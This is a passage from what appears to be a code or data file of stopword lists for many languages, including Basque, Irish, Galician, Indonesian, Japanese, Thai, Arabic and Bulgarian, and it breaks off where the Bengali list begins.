\"hemen\",\n        \"hemendik\",\n        \"hemengo\",\n        \"hi\",\n        \"hona\",\n        \"honek\",\n        \"honela\",\n        \"honetan\",\n        \"honi\",\n        \"hor\",\n        \"hori\",\n        \"horiei\",\n        \"horiek\",\n        \"horietan\",\n        \"horko\",\n        \"horra\",\n        \"horrek\",\n        \"horrela\",\n        \"horretan\",\n        \"horri\",\n        \"hortik\",\n        \"hura\",\n        \"izan\",\n        \"ni\",\n        \"noiz\",\n        \"nola\",\n        \"non\",\n        \"nondik\",\n        \"nongo\",\n        \"nor\",\n        \"nora\",\n        \"ze\",\n        \"zein\",\n        \"zen\",\n        \"zenbait\",\n        \"zenbat\",\n        \"zer\",\n        \"zergatik\",\n        \"ziren\",\n        \"zituen\",\n        \"zu\",\n        \"zuek\",\n        \"zuen\",\n        \"zuten\",\n    ],\n    \"ga\": [\n        \"a\",\n        \"ach\",\n        \"ag\",\n        \"agus\",\n        \"an\",\n        \"aon\",\n        \"ar\",\n        \"arna\",\n        \"as\",\n        \"b'\",\n        \"ba\",\n        \"beirt\",\n        \"bhúr\",\n        \"caoga\",\n        \"ceathair\",\n        \"ceathrar\",\n        \"chomh\",\n        \"chtó\",\n        \"chuig\",\n        \"chun\",\n        \"cois\",\n        \"céad\",\n        \"cúig\",\n        \"cúigear\",\n        \"d'\",\n        \"daichead\",\n        \"dar\",\n        \"de\",\n        \"deich\",\n        \"deichniúr\",\n        \"den\",\n        \"dhá\",\n        \"do\",\n        \"don\",\n        \"dtí\",\n        \"dá\",\n        \"dár\",\n        \"dó\",\n        \"faoi\",\n        \"faoin\",\n        \"faoina\",\n        \"faoinár\",\n        \"fara\",\n        \"fiche\",\n        \"gach\",\n        \"gan\",\n        \"go\",\n        \"gur\",\n        \"haon\",\n        \"hocht\",\n        \"i\",\n        \"iad\",\n        \"idir\",\n        \"in\",\n        \"ina\",\n        \"ins\",\n        \"inár\",\n        \"is\",\n        \"le\",\n     
   \"leis\",\n        \"lena\",\n        \"lenár\",\n        \"m'\",\n        \"mar\",\n        \"mo\",\n        \"mé\",\n        \"na\",\n        \"nach\",\n        \"naoi\",\n        \"naonúr\",\n        \"ná\",\n        \"ní\",\n        \"níor\",\n        \"nó\",\n        \"nócha\",\n        \"ocht\",\n        \"ochtar\",\n        \"os\",\n        \"roimh\",\n        \"sa\",\n        \"seacht\",\n        \"seachtar\",\n        \"seachtó\",\n        \"seasca\",\n        \"seisear\",\n        \"siad\",\n        \"sibh\",\n        \"sinn\",\n        \"sna\",\n        \"sé\",\n        \"sí\",\n        \"tar\",\n        \"thar\",\n        \"thú\",\n        \"triúr\",\n        \"trí\",\n        \"trína\",\n        \"trínár\",\n        \"tríocha\",\n        \"tú\",\n        \"um\",\n        \"ár\",\n        \"é\",\n        \"éis\",\n        \"í\",\n        \"ó\",\n        \"ón\",\n        \"óna\",\n        \"ónár\",\n    ],\n    \"gl\": [\n        \"a\",\n        \"alí\",\n        \"ao\",\n        \"aos\",\n        \"aquel\",\n        \"aquela\",\n        \"aquelas\",\n        \"aqueles\",\n        \"aquilo\",\n        \"aquí\",\n        \"as\",\n        \"así\",\n        \"aínda\",\n        \"ben\",\n        \"cando\",\n        \"che\",\n        \"co\",\n        \"coa\",\n        \"coas\",\n        \"comigo\",\n        \"con\",\n        \"connosco\",\n        \"contigo\",\n        \"convosco\",\n        \"cos\",\n        \"cun\",\n        \"cunha\",\n        \"cunhas\",\n        \"cuns\",\n        \"da\",\n        \"dalgunha\",\n        \"dalgunhas\",\n        \"dalgún\",\n        \"dalgúns\",\n        \"das\",\n        \"de\",\n        \"del\",\n        \"dela\",\n        \"delas\",\n        \"deles\",\n        \"desde\",\n        \"deste\",\n        \"do\",\n        \"dos\",\n        \"dun\",\n        \"dunha\",\n        \"dunhas\",\n        \"duns\",\n        \"e\",\n        \"el\",\n        \"ela\",\n        \"elas\",\n        \"eles\",\n        \"en\",\n        
\"era\",\n        \"eran\",\n        \"esa\",\n        \"esas\",\n        \"ese\",\n        \"eses\",\n        \"esta\",\n        \"estaba\",\n        \"estar\",\n        \"este\",\n        \"estes\",\n        \"estiven\",\n        \"estou\",\n        \"está\",\n        \"están\",\n        \"eu\",\n        \"facer\",\n        \"foi\",\n        \"foron\",\n        \"fun\",\n        \"había\",\n        \"hai\",\n        \"iso\",\n        \"isto\",\n        \"la\",\n        \"las\",\n        \"lle\",\n        \"lles\",\n        \"lo\",\n        \"los\",\n        \"mais\",\n        \"me\",\n        \"meu\",\n        \"meus\",\n        \"min\",\n        \"miña\",\n        \"miñas\",\n        \"moi\",\n        \"na\",\n        \"nas\",\n        \"neste\",\n        \"nin\",\n        \"no\",\n        \"non\",\n        \"nos\",\n        \"nosa\",\n        \"nosas\",\n        \"noso\",\n        \"nosos\",\n        \"nun\",\n        \"nunha\",\n        \"nunhas\",\n        \"nuns\",\n        \"nós\",\n        \"o\",\n        \"os\",\n        \"ou\",\n        \"para\",\n        \"pero\",\n        \"pode\",\n        \"pois\",\n        \"pola\",\n        \"polas\",\n        \"polo\",\n        \"polos\",\n        \"por\",\n        \"que\",\n        \"se\",\n        \"senón\",\n        \"ser\",\n        \"seu\",\n        \"seus\",\n        \"sexa\",\n        \"sido\",\n        \"sobre\",\n        \"súa\",\n        \"súas\",\n        \"tamén\",\n        \"tan\",\n        \"te\",\n        \"ten\",\n        \"ter\",\n        \"teu\",\n        \"teus\",\n        \"teñen\",\n        \"teño\",\n        \"ti\",\n        \"tido\",\n        \"tiven\",\n        \"tiña\",\n        \"túa\",\n        \"túas\",\n        \"un\",\n        \"unha\",\n        \"unhas\",\n        \"uns\",\n        \"vos\",\n        \"vosa\",\n        \"vosas\",\n        \"voso\",\n        \"vosos\",\n        \"vós\",\n        \"á\",\n        \"é\",\n        \"ó\",\n        \"ós\",\n    ],\n    \"hy\": [\n        
\"այդ\",\n        \"այլ\",\n        \"այն\",\n        \"այս\",\n        \"դու\",\n        \"դուք\",\n        \"եմ\",\n        \"են\",\n        \"ենք\",\n        \"ես\",\n        \"եք\",\n        \"է\",\n        \"էի\",\n        \"էին\",\n        \"էինք\",\n        \"էիր\",\n        \"էիք\",\n        \"էր\",\n        \"ըստ\",\n        \"թ\",\n        \"ի\",\n        \"ին\",\n        \"իսկ\",\n        \"իր\",\n        \"կամ\",\n        \"համար\",\n        \"հետ\",\n        \"հետո\",\n        \"մենք\",\n        \"մեջ\",\n        \"մի\",\n        \"ն\",\n        \"նա\",\n        \"նաև\",\n        \"նրա\",\n        \"նրանք\",\n        \"որ\",\n        \"որը\",\n        \"որոնք\",\n        \"որպես\",\n        \"ու\",\n        \"ում\",\n        \"պիտի\",\n        \"վրա\",\n        \"և\",\n    ],\n    \"id\": [\n        \"ada\",\n        \"adalah\",\n        \"adanya\",\n        \"adapun\",\n        \"agak\",\n        \"agaknya\",\n        \"agar\",\n        \"akan\",\n        \"akankah\",\n        \"akhirnya\",\n        \"aku\",\n        \"akulah\",\n        \"amat\",\n        \"amatlah\",\n        \"anda\",\n        \"andalah\",\n        \"antar\",\n        \"antara\",\n        \"antaranya\",\n        \"apa\",\n        \"apaan\",\n        \"apabila\",\n        \"apakah\",\n        \"apalagi\",\n        \"apatah\",\n        \"atau\",\n        \"ataukah\",\n        \"ataupun\",\n        \"bagai\",\n        \"bagaikan\",\n        \"bagaimana\",\n        \"bagaimanakah\",\n        \"bagaimanapun\",\n        \"bagi\",\n        \"bahkan\",\n        \"bahwa\",\n        \"bahwasanya\",\n        \"banyak\",\n        \"beberapa\",\n        \"begini\",\n        \"beginian\",\n        \"beginikah\",\n        \"beginilah\",\n        \"begitu\",\n        \"begitukah\",\n        \"begitulah\",\n        \"begitupun\",\n        \"belum\",\n        \"belumlah\",\n        \"berapa\",\n        \"berapakah\",\n        \"berapalah\",\n        \"berapapun\",\n        \"bermacam\",\n        
\"bersama\",\n        \"betulkah\",\n        \"biasa\",\n        \"biasanya\",\n        \"bila\",\n        \"bilakah\",\n        \"bisa\",\n        \"bisakah\",\n        \"boleh\",\n        \"bolehkah\",\n        \"bolehlah\",\n        \"buat\",\n        \"bukan\",\n        \"bukankah\",\n        \"bukanlah\",\n        \"bukannya\",\n        \"cuma\",\n        \"dahulu\",\n        \"dalam\",\n        \"dan\",\n        \"dapat\",\n        \"dari\",\n        \"daripada\",\n        \"dekat\",\n        \"demi\",\n        \"demikian\",\n        \"demikianlah\",\n        \"dengan\",\n        \"depan\",\n        \"di\",\n        \"dia\",\n        \"dialah\",\n        \"diantara\",\n        \"diantaranya\",\n        \"dikarenakan\",\n        \"dini\",\n        \"diri\",\n        \"dirinya\",\n        \"disini\",\n        \"disinilah\",\n        \"dong\",\n        \"dulu\",\n        \"enggak\",\n        \"enggaknya\",\n        \"entah\",\n        \"entahlah\",\n        \"hal\",\n        \"hampir\",\n        \"hanya\",\n        \"hanyalah\",\n        \"harus\",\n        \"haruslah\",\n        \"harusnya\",\n        \"hendak\",\n        \"hendaklah\",\n        \"hendaknya\",\n        \"hingga\",\n        \"ia\",\n        \"ialah\",\n        \"ibarat\",\n        \"ingin\",\n        \"inginkah\",\n        \"inginkan\",\n        \"ini\",\n        \"inikah\",\n        \"inilah\",\n        \"itu\",\n        \"itukah\",\n        \"itulah\",\n        \"jangan\",\n        \"jangankan\",\n        \"janganlah\",\n        \"jika\",\n        \"jikalau\",\n        \"juga\",\n        \"justru\",\n        \"kala\",\n        \"kalau\",\n        \"kalaulah\",\n        \"kalaupun\",\n        \"kalian\",\n        \"kami\",\n        \"kamilah\",\n        \"kamu\",\n        \"kamulah\",\n        \"kan\",\n        \"kapan\",\n        \"kapankah\",\n        \"kapanpun\",\n        \"karena\",\n        \"karenanya\",\n        \"ke\",\n        \"kecil\",\n        \"kemudian\",\n        \"kenapa\",\n   
     \"kepada\",\n        \"kepadanya\",\n        \"ketika\",\n        \"khususnya\",\n        \"kini\",\n        \"kinilah\",\n        \"kiranya\",\n        \"kita\",\n        \"kitalah\",\n        \"kok\",\n        \"lagi\",\n        \"lagian\",\n        \"lah\",\n        \"lain\",\n        \"lainnya\",\n        \"lalu\",\n        \"lama\",\n        \"lamanya\",\n        \"lebih\",\n        \"macam\",\n        \"maka\",\n        \"makanya\",\n        \"makin\",\n        \"malah\",\n        \"malahan\",\n        \"mampu\",\n        \"mampukah\",\n        \"mana\",\n        \"manakala\",\n        \"manalagi\",\n        \"masih\",\n        \"masihkah\",\n        \"masing\",\n        \"mau\",\n        \"maupun\",\n        \"melainkan\",\n        \"melalui\",\n        \"memang\",\n        \"mengapa\",\n        \"mereka\",\n        \"merekalah\",\n        \"merupakan\",\n        \"meski\",\n        \"meskipun\",\n        \"mungkin\",\n        \"mungkinkah\",\n        \"nah\",\n        \"namun\",\n        \"nanti\",\n        \"nantinya\",\n        \"nyaris\",\n        \"oleh\",\n        \"olehnya\",\n        \"pada\",\n        \"padahal\",\n        \"padanya\",\n        \"paling\",\n        \"pantas\",\n        \"para\",\n        \"pasti\",\n        \"pastilah\",\n        \"per\",\n        \"percuma\",\n        \"pernah\",\n        \"pula\",\n        \"pun\",\n        \"rupanya\",\n        \"saat\",\n        \"saatnya\",\n        \"saja\",\n        \"sajalah\",\n        \"saling\",\n        \"sama\",\n        \"sambil\",\n        \"sampai\",\n        \"sana\",\n        \"sangat\",\n        \"sangatlah\",\n        \"saya\",\n        \"sayalah\",\n        \"se\",\n        \"sebab\",\n        \"sebabnya\",\n        \"sebagai\",\n        \"sebagaimana\",\n        \"sebagainya\",\n        \"sebaliknya\",\n        \"sebanyak\",\n        \"sebegini\",\n        \"sebegitu\",\n        \"sebelum\",\n        \"sebelumnya\",\n        \"sebenarnya\",\n        \"seberapa\",\n        
\"sebetulnya\",\n        \"sebisanya\",\n        \"sebuah\",\n        \"sedang\",\n        \"sedangkan\",\n        \"sedemikian\",\n        \"sedikit\",\n        \"sedikitnya\",\n        \"segala\",\n        \"segalanya\",\n        \"segera\",\n        \"seharusnya\",\n        \"sehingga\",\n        \"sejak\",\n        \"sejenak\",\n        \"sekali\",\n        \"sekalian\",\n        \"sekaligus\",\n        \"sekalipun\",\n        \"sekarang\",\n        \"seketika\",\n        \"sekiranya\",\n        \"sekitar\",\n        \"sekitarnya\",\n        \"sela\",\n        \"selagi\",\n        \"selain\",\n        \"selaku\",\n        \"selalu\",\n        \"selama\",\n        \"selamanya\",\n        \"seluruh\",\n        \"seluruhnya\",\n        \"semacam\",\n        \"semakin\",\n        \"semasih\",\n        \"semaunya\",\n        \"sementara\",\n        \"sempat\",\n        \"semua\",\n        \"semuanya\",\n        \"semula\",\n        \"sendiri\",\n        \"sendirinya\",\n        \"seolah\",\n        \"seorang\",\n        \"sepanjang\",\n        \"sepantasnya\",\n        \"sepantasnyalah\",\n        \"seperti\",\n        \"sepertinya\",\n        \"sering\",\n        \"seringnya\",\n        \"serta\",\n        \"serupa\",\n        \"sesaat\",\n        \"sesama\",\n        \"sesegera\",\n        \"sesekali\",\n        \"seseorang\",\n        \"sesuatu\",\n        \"sesuatunya\",\n        \"sesudah\",\n        \"sesudahnya\",\n        \"setelah\",\n        \"seterusnya\",\n        \"setiap\",\n        \"setidaknya\",\n        \"sewaktu\",\n        \"siapa\",\n        \"siapakah\",\n        \"siapapun\",\n        \"sini\",\n        \"sinilah\",\n        \"suatu\",\n        \"sudah\",\n        \"sudahkah\",\n        \"sudahlah\",\n        \"supaya\",\n        \"tadi\",\n        \"tadinya\",\n        \"tak\",\n        \"tanpa\",\n        \"tapi\",\n        \"telah\",\n        \"tentang\",\n        \"tentu\",\n        \"tentulah\",\n        \"tentunya\",\n        
\"terdiri\",\n        \"terhadap\",\n        \"terhadapnya\",\n        \"terlalu\",\n        \"terlebih\",\n        \"tersebut\",\n        \"tersebutlah\",\n        \"tertentu\",\n        \"tetapi\",\n        \"tiap\",\n        \"tidak\",\n        \"tidakkah\",\n        \"tidaklah\",\n        \"toh\",\n        \"waduh\",\n        \"wah\",\n        \"wahai\",\n        \"walau\",\n        \"walaupun\",\n        \"wong\",\n        \"yaitu\",\n        \"yakni\",\n        \"yang\",\n    ],\n    \"ja\": [\n        \"あっ\",\n        \"あり\",\n        \"ある\",\n        \"い\",\n        \"いう\",\n        \"いる\",\n        \"う\",\n        \"うち\",\n        \"お\",\n        \"および\",\n        \"おり\",\n        \"か\",\n        \"かつて\",\n        \"から\",\n        \"が\",\n        \"き\",\n        \"ここ\",\n        \"こと\",\n        \"この\",\n        \"これ\",\n        \"これら\",\n        \"さ\",\n        \"さらに\",\n        \"し\",\n        \"しかし\",\n        \"する\",\n        \"ず\",\n        \"せ\",\n        \"せる\",\n        \"そして\",\n        \"その\",\n        \"その他\",\n        \"その後\",\n        \"それ\",\n        \"それぞれ\",\n        \"た\",\n        \"ただし\",\n        \"たち\",\n        \"ため\",\n        \"たり\",\n        \"だ\",\n        \"だっ\",\n        \"つ\",\n        \"て\",\n        \"で\",\n        \"でき\",\n        \"できる\",\n        \"です\",\n        \"では\",\n        \"でも\",\n        \"と\",\n        \"という\",\n        \"といった\",\n        \"とき\",\n        \"ところ\",\n        \"として\",\n        \"とともに\",\n        \"とも\",\n        \"と共に\",\n        \"な\",\n        \"ない\",\n        \"なお\",\n        \"なかっ\",\n        \"ながら\",\n        \"なく\",\n        \"なっ\",\n        \"など\",\n        \"なら\",\n        \"なり\",\n        \"なる\",\n        \"に\",\n        \"において\",\n        \"における\",\n        \"について\",\n        \"にて\",\n        \"によって\",\n        \"により\",\n        \"による\",\n        \"に対して\",\n        \"に対する\",\n        \"に関する\",\n        \"の\",\n        \"ので\",\n        \"のみ\",\n        \"は\",\n        \"ば\",\n        
\"へ\",\n        \"ほか\",\n        \"ほとんど\",\n        \"ほど\",\n        \"ます\",\n        \"また\",\n        \"または\",\n        \"まで\",\n        \"も\",\n        \"もの\",\n        \"ものの\",\n        \"や\",\n        \"よう\",\n        \"より\",\n        \"ら\",\n        \"られ\",\n        \"られる\",\n        \"れ\",\n        \"れる\",\n        \"を\",\n        \"ん\",\n        \"及び\",\n        \"特に\",\n    ],\n    \"lv\": [\n        \"aiz\",\n        \"ap\",\n        \"apakš\",\n        \"apakšpus\",\n        \"ar\",\n        \"arī\",\n        \"augšpus\",\n        \"bet\",\n        \"bez\",\n        \"bija\",\n        \"biji\",\n        \"biju\",\n        \"bijām\",\n        \"bijāt\",\n        \"būs\",\n        \"būsi\",\n        \"būsiet\",\n        \"būsim\",\n        \"būt\",\n        \"būšu\",\n        \"caur\",\n        \"diemžēl\",\n        \"diezin\",\n        \"droši\",\n        \"dēļ\",\n        \"esam\",\n        \"esat\",\n        \"esi\",\n        \"esmu\",\n        \"gan\",\n        \"gar\",\n        \"iekam\",\n        \"iekams\",\n        \"iekām\",\n        \"iekāms\",\n        \"iekš\",\n        \"iekšpus\",\n        \"ik\",\n        \"ir\",\n        \"it\",\n        \"itin\",\n        \"iz\",\n        \"ja\",\n        \"jau\",\n        \"jeb\",\n        \"jebšu\",\n        \"jel\",\n        \"jo\",\n        \"jā\",\n        \"ka\",\n        \"kamēr\",\n        \"kaut\",\n        \"kolīdz\",\n        \"kopš\",\n        \"kā\",\n        \"kļuva\",\n        \"kļuvi\",\n        \"kļuvu\",\n        \"kļuvām\",\n        \"kļuvāt\",\n        \"kļūs\",\n        \"kļūsi\",\n        \"kļūsiet\",\n        \"kļūsim\",\n        \"kļūst\",\n        \"kļūstam\",\n        \"kļūstat\",\n        \"kļūsti\",\n        \"kļūstu\",\n        \"kļūt\",\n        \"kļūšu\",\n        \"labad\",\n        \"lai\",\n        \"lejpus\",\n        \"līdz\",\n        \"līdzko\",\n        \"ne\",\n        \"nebūt\",\n        \"nedz\",\n        \"nekā\",\n        \"nevis\",\n        \"nezin\",\n        
\"no\",\n        \"nu\",\n        \"nē\",\n        \"otrpus\",\n        \"pa\",\n        \"par\",\n        \"pat\",\n        \"pie\",\n        \"pirms\",\n        \"pret\",\n        \"priekš\",\n        \"pār\",\n        \"pēc\",\n        \"starp\",\n        \"tad\",\n        \"tak\",\n        \"tapi\",\n        \"taps\",\n        \"tapsi\",\n        \"tapsiet\",\n        \"tapsim\",\n        \"tapt\",\n        \"tapāt\",\n        \"tapšu\",\n        \"taču\",\n        \"te\",\n        \"tiec\",\n        \"tiek\",\n        \"tiekam\",\n        \"tiekat\",\n        \"tieku\",\n        \"tik\",\n        \"tika\",\n        \"tikai\",\n        \"tiki\",\n        \"tikko\",\n        \"tiklab\",\n        \"tiklīdz\",\n        \"tiks\",\n        \"tiksiet\",\n        \"tiksim\",\n        \"tikt\",\n        \"tiku\",\n        \"tikvien\",\n        \"tikām\",\n        \"tikāt\",\n        \"tikšu\",\n        \"tomēr\",\n        \"topat\",\n        \"turpretim\",\n        \"turpretī\",\n        \"tā\",\n        \"tādēļ\",\n        \"tālab\",\n        \"tāpēc\",\n        \"un\",\n        \"uz\",\n        \"vai\",\n        \"var\",\n        \"varat\",\n        \"varēja\",\n        \"varēji\",\n        \"varēju\",\n        \"varējām\",\n        \"varējāt\",\n        \"varēs\",\n        \"varēsi\",\n        \"varēsiet\",\n        \"varēsim\",\n        \"varēt\",\n        \"varēšu\",\n        \"vien\",\n        \"virs\",\n        \"virspus\",\n        \"vis\",\n        \"viņpus\",\n        \"zem\",\n        \"ārpus\",\n        \"šaipus\",\n    ],\n    \"th\": [\n        \"กล่าว\",\n        \"กว่า\",\n        \"กัน\",\n        \"กับ\",\n        \"การ\",\n        \"ก็\",\n        \"ก่อน\",\n        \"ขณะ\",\n        \"ขอ\",\n        \"ของ\",\n        \"ขึ้น\",\n        \"คง\",\n        \"ครั้ง\",\n        \"ความ\",\n        \"คือ\",\n        \"จะ\",\n        \"จัด\",\n        \"จาก\",\n        \"จึง\",\n        \"ช่วง\",\n        \"ซึ่ง\",\n        \"ดัง\",\n        \"ด้วย\",\n      
  \"ด้าน\",\n        \"ตั้ง\",\n        \"ตั้งแต่\",\n        \"ตาม\",\n        \"ต่อ\",\n        \"ต่าง\",\n        \"ต่างๆ\",\n        \"ต้อง\",\n        \"ถึง\",\n        \"ถูก\",\n        \"ถ้า\",\n        \"ทั้ง\",\n        \"ทั้งนี้\",\n        \"ทาง\",\n        \"ที่\",\n        \"ที่สุด\",\n        \"ทุก\",\n        \"ทํา\",\n        \"ทําให้\",\n        \"นอกจาก\",\n        \"นัก\",\n        \"นั้น\",\n        \"นี้\",\n        \"น่า\",\n        \"นํา\",\n        \"บาง\",\n        \"ผล\",\n        \"ผ่าน\",\n        \"พบ\",\n        \"พร้อม\",\n        \"มา\",\n        \"มาก\",\n        \"มี\",\n        \"ยัง\",\n        \"รวม\",\n        \"ระหว่าง\",\n        \"รับ\",\n        \"ราย\",\n        \"ร่วม\",\n        \"ลง\",\n        \"วัน\",\n        \"ว่า\",\n        \"สุด\",\n        \"ส่ง\",\n        \"ส่วน\",\n        \"สําหรับ\",\n        \"หนึ่ง\",\n        \"หรือ\",\n        \"หลัง\",\n        \"หลังจาก\",\n        \"หลาย\",\n        \"หาก\",\n        \"อยาก\",\n        \"อยู่\",\n        \"อย่าง\",\n        \"ออก\",\n        \"อะไร\",\n        \"อาจ\",\n        \"อีก\",\n        \"เขา\",\n        \"เข้า\",\n        \"เคย\",\n        \"เฉพาะ\",\n        \"เช่น\",\n        \"เดียว\",\n        \"เดียวกัน\",\n        \"เนื่องจาก\",\n        \"เปิด\",\n        \"เปิดเผย\",\n        \"เป็น\",\n        \"เป็นการ\",\n        \"เพราะ\",\n        \"เพื่อ\",\n        \"เมื่อ\",\n        \"เรา\",\n        \"เริ่ม\",\n        \"เลย\",\n        \"เห็น\",\n        \"เอง\",\n        \"แต่\",\n        \"แบบ\",\n        \"แรก\",\n        \"และ\",\n        \"แล้ว\",\n        \"แห่ง\",\n        \"โดย\",\n        \"ใน\",\n        \"ให้\",\n        \"ได้\",\n        \"ไป\",\n        \"ไม่\",\n        \"ไว้\",\n    ],\n    \"ar\": [\n        \"،\",\n        \"أ\",\n        \"ا\",\n        \"اثر\",\n        \"اجل\",\n        \"احد\",\n        \"اخرى\",\n        \"اذا\",\n        \"اربعة\",\n        \"اطار\",\n        \"اعادة\",\n        \"اعلنت\",\n        \"اف\",\n        
\"اكثر\",\n        \"اكد\",\n        \"الا\",\n        \"الاخيرة\",\n        \"الان\",\n        \"الاول\",\n        \"الاولى\",\n        \"التى\",\n        \"التي\",\n        \"الثاني\",\n        \"الثانية\",\n        \"الذاتي\",\n        \"الذى\",\n        \"الذي\",\n        \"الذين\",\n        \"السابق\",\n        \"الف\",\n        \"الماضي\",\n        \"المقبل\",\n        \"الوقت\",\n        \"الى\",\n        \"اليوم\",\n        \"اما\",\n        \"امام\",\n        \"امس\",\n        \"ان\",\n        \"انه\",\n        \"انها\",\n        \"او\",\n        \"اول\",\n        \"اي\",\n        \"ايار\",\n        \"ايام\",\n        \"ايضا\",\n        \"ب\",\n        \"باسم\",\n        \"بان\",\n        \"برس\",\n        \"بسبب\",\n        \"بشكل\",\n        \"بعد\",\n        \"بعض\",\n        \"بن\",\n        \"به\",\n        \"بها\",\n        \"بين\",\n        \"تم\",\n        \"ثلاثة\",\n        \"ثم\",\n        \"جميع\",\n        \"حاليا\",\n        \"حتى\",\n        \"حوالى\",\n        \"حول\",\n        \"حيث\",\n        \"حين\",\n        \"خلال\",\n        \"دون\",\n        \"ذلك\",\n        \"زيارة\",\n        \"سنة\",\n        \"سنوات\",\n        \"شخصا\",\n        \"صباح\",\n        \"صفر\",\n        \"ضد\",\n        \"ضمن\",\n        \"عام\",\n        \"عاما\",\n        \"عدة\",\n        \"عدد\",\n        \"عدم\",\n        \"عشر\",\n        \"عشرة\",\n        \"على\",\n        \"عليه\",\n        \"عليها\",\n        \"عن\",\n        \"عند\",\n        \"عندما\",\n        \"غدا\",\n        \"غير\",\n        \"ـ\",\n        \"ف\",\n        \"فان\",\n        \"فى\",\n        \"في\",\n        \"فيه\",\n        \"فيها\",\n        \"قال\",\n        \"قبل\",\n        \"قد\",\n        \"قوة\",\n        \"كان\",\n        \"كانت\",\n        \"كل\",\n        \"كلم\",\n        \"كما\",\n        \"لا\",\n        \"لدى\",\n        \"لقاء\",\n        \"لكن\",\n        \"للامم\",\n        \"لم\",\n        \"لن\",\n        \"له\",\n        \"لها\",\n        \"لوكالة\",\n        
\"ما\",\n        \"مايو\",\n        \"مساء\",\n        \"مع\",\n        \"مقابل\",\n        \"مليار\",\n        \"مليون\",\n        \"من\",\n        \"منذ\",\n        \"منها\",\n        \"نحو\",\n        \"نفسه\",\n        \"نهاية\",\n        \"هذا\",\n        \"هذه\",\n        \"هناك\",\n        \"هو\",\n        \"هي\",\n        \"و\",\n        \"و6\",\n        \"واحد\",\n        \"واضاف\",\n        \"واضافت\",\n        \"واكد\",\n        \"وان\",\n        \"واوضح\",\n        \"وفي\",\n        \"وقال\",\n        \"وقالت\",\n        \"وقد\",\n        \"وقف\",\n        \"وكان\",\n        \"وكانت\",\n        \"ولا\",\n        \"ولم\",\n        \"ومن\",\n        \"وهو\",\n        \"وهي\",\n        \"يكون\",\n        \"يمكن\",\n        \"يوم\",\n    ],\n    \"bg\": [\n        \"а\",\n        \"автентичен\",\n        \"аз\",\n        \"ако\",\n        \"ала\",\n        \"бе\",\n        \"без\",\n        \"беше\",\n        \"би\",\n        \"бивш\",\n        \"бивша\",\n        \"бившо\",\n        \"бил\",\n        \"била\",\n        \"били\",\n        \"било\",\n        \"благодаря\",\n        \"близо\",\n        \"бъдат\",\n        \"бъде\",\n        \"бяха\",\n        \"в\",\n        \"вас\",\n        \"ваш\",\n        \"ваша\",\n        \"вероятно\",\n        \"вече\",\n        \"взема\",\n        \"ви\",\n        \"вие\",\n        \"винаги\",\n        \"внимава\",\n        \"време\",\n        \"все\",\n        \"всеки\",\n        \"всички\",\n        \"всичко\",\n        \"всяка\",\n        \"във\",\n        \"въпреки\",\n        \"върху\",\n        \"г\",\n        \"ги\",\n        \"главен\",\n        \"главна\",\n        \"главно\",\n        \"глас\",\n        \"го\",\n        \"година\",\n        \"години\",\n        \"годишен\",\n        \"д\",\n        \"да\",\n        \"дали\",\n        \"два\",\n        \"двама\",\n        \"двамата\",\n        \"две\",\n        \"двете\",\n        \"ден\",\n        \"днес\",\n        \"дни\",\n        \"до\",\n        
\"добра\",\n        \"добре\",\n        \"добро\",\n        \"добър\",\n        \"докато\",\n        \"докога\",\n        \"дори\",\n        \"досега\",\n        \"доста\",\n        \"друг\",\n        \"друга\",\n        \"други\",\n        \"е\",\n        \"евтин\",\n        \"едва\",\n        \"един\",\n        \"една\",\n        \"еднаква\",\n        \"еднакви\",\n        \"еднакъв\",\n        \"едно\",\n        \"екип\",\n        \"ето\",\n        \"живот\",\n        \"за\",\n        \"забавям\",\n        \"зад\",\n        \"заедно\",\n        \"заради\",\n        \"засега\",\n        \"заспал\",\n        \"затова\",\n        \"защо\",\n        \"защото\",\n        \"и\",\n        \"из\",\n        \"или\",\n        \"им\",\n        \"има\",\n        \"имат\",\n        \"иска\",\n        \"й\",\n        \"каза\",\n        \"как\",\n        \"каква\",\n        \"какво\",\n        \"както\",\n        \"какъв\",\n        \"като\",\n        \"кога\",\n        \"когато\",\n        \"което\",\n        \"които\",\n        \"кой\",\n        \"който\",\n        \"колко\",\n        \"която\",\n        \"къде\",\n        \"където\",\n        \"към\",\n        \"лесен\",\n        \"лесно\",\n        \"ли\",\n        \"лош\",\n        \"м\",\n        \"май\",\n        \"малко\",\n        \"ме\",\n        \"между\",\n        \"мек\",\n        \"мен\",\n        \"месец\",\n        \"ми\",\n        \"много\",\n        \"мнозина\",\n        \"мога\",\n        \"могат\",\n        \"може\",\n        \"мокър\",\n        \"моля\",\n        \"момента\",\n        \"му\",\n        \"н\",\n        \"на\",\n        \"над\",\n        \"назад\",\n        \"най\",\n        \"направи\",\n        \"напред\",\n        \"например\",\n        \"нас\",\n        \"не\",\n        \"него\",\n        \"нещо\",\n        \"нея\",\n        \"ни\",\n        \"ние\",\n        \"никой\",\n        \"нито\",\n        \"нищо\",\n        \"но\",\n        \"нов\",\n        \"нова\",\n        \"нови\",\n        
\"новина\",\n        \"някои\",\n        \"някой\",\n        \"няколко\",\n        \"няма\",\n        \"обаче\",\n        \"около\",\n        \"освен\",\n        \"особено\",\n        \"от\",\n        \"отгоре\",\n        \"отново\",\n        \"още\",\n        \"пак\",\n        \"по\",\n        \"повече\",\n        \"повечето\",\n        \"под\",\n        \"поне\",\n        \"поради\",\n        \"после\",\n        \"почти\",\n        \"прави\",\n        \"пред\",\n        \"преди\",\n        \"през\",\n        \"при\",\n        \"пък\",\n        \"първата\",\n        \"първи\",\n        \"първо\",\n        \"пъти\",\n        \"равен\",\n        \"равна\",\n        \"с\",\n        \"са\",\n        \"сам\",\n        \"само\",\n        \"се\",\n        \"сега\",\n        \"си\",\n        \"син\",\n        \"скоро\",\n        \"след\",\n        \"следващ\",\n        \"сме\",\n        \"смях\",\n        \"според\",\n        \"сред\",\n        \"срещу\",\n        \"сте\",\n        \"съм\",\n        \"със\",\n        \"също\",\n        \"т\",\n        \"т.н.\",\n        \"тази\",\n        \"така\",\n        \"такива\",\n        \"такъв\",\n        \"там\",\n        \"твой\",\n        \"те\",\n        \"тези\",\n        \"ти\",\n        \"то\",\n        \"това\",\n        \"тогава\",\n        \"този\",\n        \"той\",\n        \"толкова\",\n        \"точно\",\n        \"три\",\n        \"трябва\",\n        \"тук\",\n        \"тъй\",\n        \"тя\",\n        \"тях\",\n        \"у\",\n        \"утре\",\n        \"харесва\",\n        \"хиляди\",\n        \"ч\",\n        \"часа\",\n        \"че\",\n        \"често\",\n        \"чрез\",\n        \"ще\",\n        \"щом\",\n        \"юмрук\",\n        \"я\",\n        \"як\",\n    ],\n    \"bn\": [\n        